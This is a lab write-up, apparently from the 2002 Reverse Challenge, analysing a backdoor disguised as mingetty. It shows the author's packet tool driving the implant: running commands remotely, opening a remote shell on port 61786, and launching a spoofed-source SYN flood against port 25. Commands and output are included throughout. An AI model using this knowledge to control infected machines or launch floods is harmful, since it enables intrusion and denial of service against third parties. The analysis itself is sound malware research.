The Reverse Challenge


In order to verify my finding I wrote a simple tool that will generate all of the request packets expected. The tool is included as sp (sendpacket). The tool is not a polished product, its only purpose was to allow me to send packets to test the binary. Running sp without any arguments gives a list of the commands and hints to the arguments required. As a simple test we will send a comand to be executed on the infected host.
monitor# ./sp
    QUERY  none 
    CONF0  ip 
    CONF1  ip 
    CONF2  ipx10 
      RUN  string 
    DNS1A  ip port b_use-host hostname 
      UDP  dport ip ip use-host hostname 
     ICMP  ip ip use-host hostname 
    SHELL  none; telnet to port 61786 
   SYSTEM  string 
     KILL  none 
    DNS1B  ip rate port b_use-host hostname 
      TCP  dip dport b_rand-src sip b_use-host hostname 
     TCP2  dip dport b_rand-src sip lu_fact b_use-host hostname 
     DNS2  sip_0x, dip lu_fact sport_0 b_use-host 

monitor# ./sp SYSTEM "ps aux | grep ming > /tmp/foo"
contents has 3 elements
sent sent 185
infected# cat /tmp/foo
root       965  0.0  0.3  1344  400 tty1     S    12:43   0:00 /sbin/mingetty tt
root       966  0.0  0.3  1344  400 tty2     S    12:43   0:00 /sbin/mingetty tt
root       967  0.0  0.3  1344  400 tty3     S    12:43   0:00 /sbin/mingetty tt
root       968  0.0  0.3  1344  400 tty4     S    12:43   0:00 /sbin/mingetty tt
root       969  0.0  0.3  1344  400 tty5     S    12:43   0:00 /sbin/mingetty tt
root       970  0.0  0.3  1344  400 tty6     S    12:43   0:00 /sbin/mingetty tt
root      1053  0.0  0.0   244   72 ?        S    12:46   0:00 [mingetty]  
root      1080  0.0  0.0   244   72 ?        S    15:20   0:00 [mingetty]  
root      1081  0.0  0.0   244   72 ?        S    15:20   0:00 [mingetty]  
After sending the ps command from 'monitor' we look for a file '/tmp/root' on 'infected'. In addition to the real mingetty process. We see three additional ones. The second one is the one that runs the program. The third process is a timer that will kill the second one after 20 minutes.

We will try one of the TCP SYN attacks. We will use a random source IP and attack the smtp port on

    No. Time        Source                Destination           Protocol Info
      1 0.000000    00:50:56:ed:cc:5f     ff:ff:ff:ff:ff:ff     ARP      Who has  Tell
      2 0.003116    00:50:56:cf:e7:82     00:50:56:ed:cc:5f     ARP is at 00:50:56:cf:e7:82
      3 0.004350       IP       Unknown (0x0b)
      4 0.013509           TCP      1002 > 25 [SYN] Seq=21105253 Ack=0 Win=436 Len=0
      5 0.022773           TCP      37748 > 25 [SYN] Seq=39679792 Ack=0 Win=1577 Len=0
      6 0.036423           TCP      17048 > 25 [SYN] Seq=12948328 Ack=0 Win=670 Len=0
      7 0.047388           TCP      19147 > 25 [SYN] Seq=16884809 Ack=0 Win=1597 Len=0
      8 0.055203           TCP      11718 > 25 [SYN] Seq=32437284 Ack=0 Win=1370 Len=0
      9 0.066187           TCP      2052 > 25 [SYN] Seq=18478549 Ack=0 Win=421 Len=0
     10 0.073792           TCP      30806 > 25 [SYN] Seq=17846612 Ack=0 Win=258 Len=0
     11 0.081813           TCP      39896 > 25 [SYN] Seq=14907996 Ack=0 Win=1570 Len=0
     12 0.089438           TCP      38678 > 25 [SYN] Seq=11403249 Ack=0 Win=943 Len=0
     13 0.097294           TCP      12461 > 25 [SYN] Seq=38207937 Ack=0 Win=1064 Len=0
     14 0.105066           TCP      36220 > 25 [SYN] Seq=15441664 Ack=0 Win=1194 Len=0
     15 0.112931           TCP      10868 > 25 [SYN] Seq=2573909 Ack=0 Win=1288 Len=0
Indeed we do have SYN requests generated from random sources. Note also that the source port and the sequence numbers are also random making it difficult to identify the attack by those fields.

The shell command is a little tricky to use. A simple telnet to the destination for does not work very well because the lines are terminated by a cr/lf pair. It's probably possible to get telnet to only send the nl. Instead I wrote a simple perl script that would send my commands to the shell and print any responses back. The main difficulty is the lack of a prompt.

monitor# ./sp shell
[jwk@Kernel active]$ hostname
[jwk@Kernel active]$ ./tel

uname -a 
Linux infected 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown

ps aux | grep mingetty
root       965  0.0  0.3  1344  400 tty1     S    12:43   0:00 /sbin/mingetty tt
root       966  0.0  0.3  1344  400 tty2     S    12:43   0:00 /sbin/mingetty tt
root       967  0.0  0.3  1344  400 tty3     S    12:43   0:00 /sbin/mingetty tt
root       968  0.0  0.3  1344  400 tty4     S    12:43   0:00 /sbin/mingetty tt
root       969  0.0  0.3  1344  400 tty5     S    12:43   0:00 /sbin/mingetty tt
root       970  0.0  0.3  1344  400 tty6     S    12:43   0:00 /sbin/mingetty tt
root      1053  0.0  0.0   244   72 ?        S    12:46   0:00 [mingetty]  
root      1088  0.0  0.0   244   72 ?        S    15:41   0:00 [mingetty]  
root      1097  0.0  0.0   188   16 ?        R    15:43   0:00 grep mingetty

[jwk@Kernel active]$ 
monitor# ./sp2 conf0
monitor# ./sp2 query
Client is  active.  mode 6  (SHELL)
After sending the shell command from my monitor machine. I then use tel to talk to the shell. It takes cares of sending the appropriate strings. Once connected I listed the hostname and did a ps to show the binaries process.

In addition I sent the QUERY command to the binary. Before doing that, I configured it with the return address. It responded that the client was active and processing command 6 which is a shell.

The other command that returns data is shell. The implementation I have is limited to receiving about 200 bytes since it only reads a single packet when the commmand is sent.

monitor# ./sp2 kill 
monitor# ./sp2 query
Client is not active.  
monitor# ./sp2 run hostname

monitor# ./sp2 run date
Thu May 30 16:38:13 CDT 2002

monitor# ./sp2 run "ps aux | grep ming | grep -v sbin"
root      1053  0.0  0.0   244  112 ?        S    12:46   0:00 [mingetty]  
root      1215  0.0  0.0   244  112 ?        S    16:40   0:00 [mingetty]  
root      1216  0.0  0.0   244  112 ?        S    16:40   0:00 [mingetty]  

monitor# ./sp2 run "ps aux | grep ming | grep -v sbin"
root      1053  0.0  0.0   244  112 ?        S    12:46   0:00 [mingetty]  
root      1222  0.0  0.0   244  112 ?        S    16:40   0:00 [mingetty]  
root      1223  0.0  0.0   244  112 ?        S    16:40   0:00 [mingetty]  

First I kill the currently running attack and verify that fact. The ps commands were selected to show the binary's process ids and not include the real mingettys. (The output would have longer than a single packet.)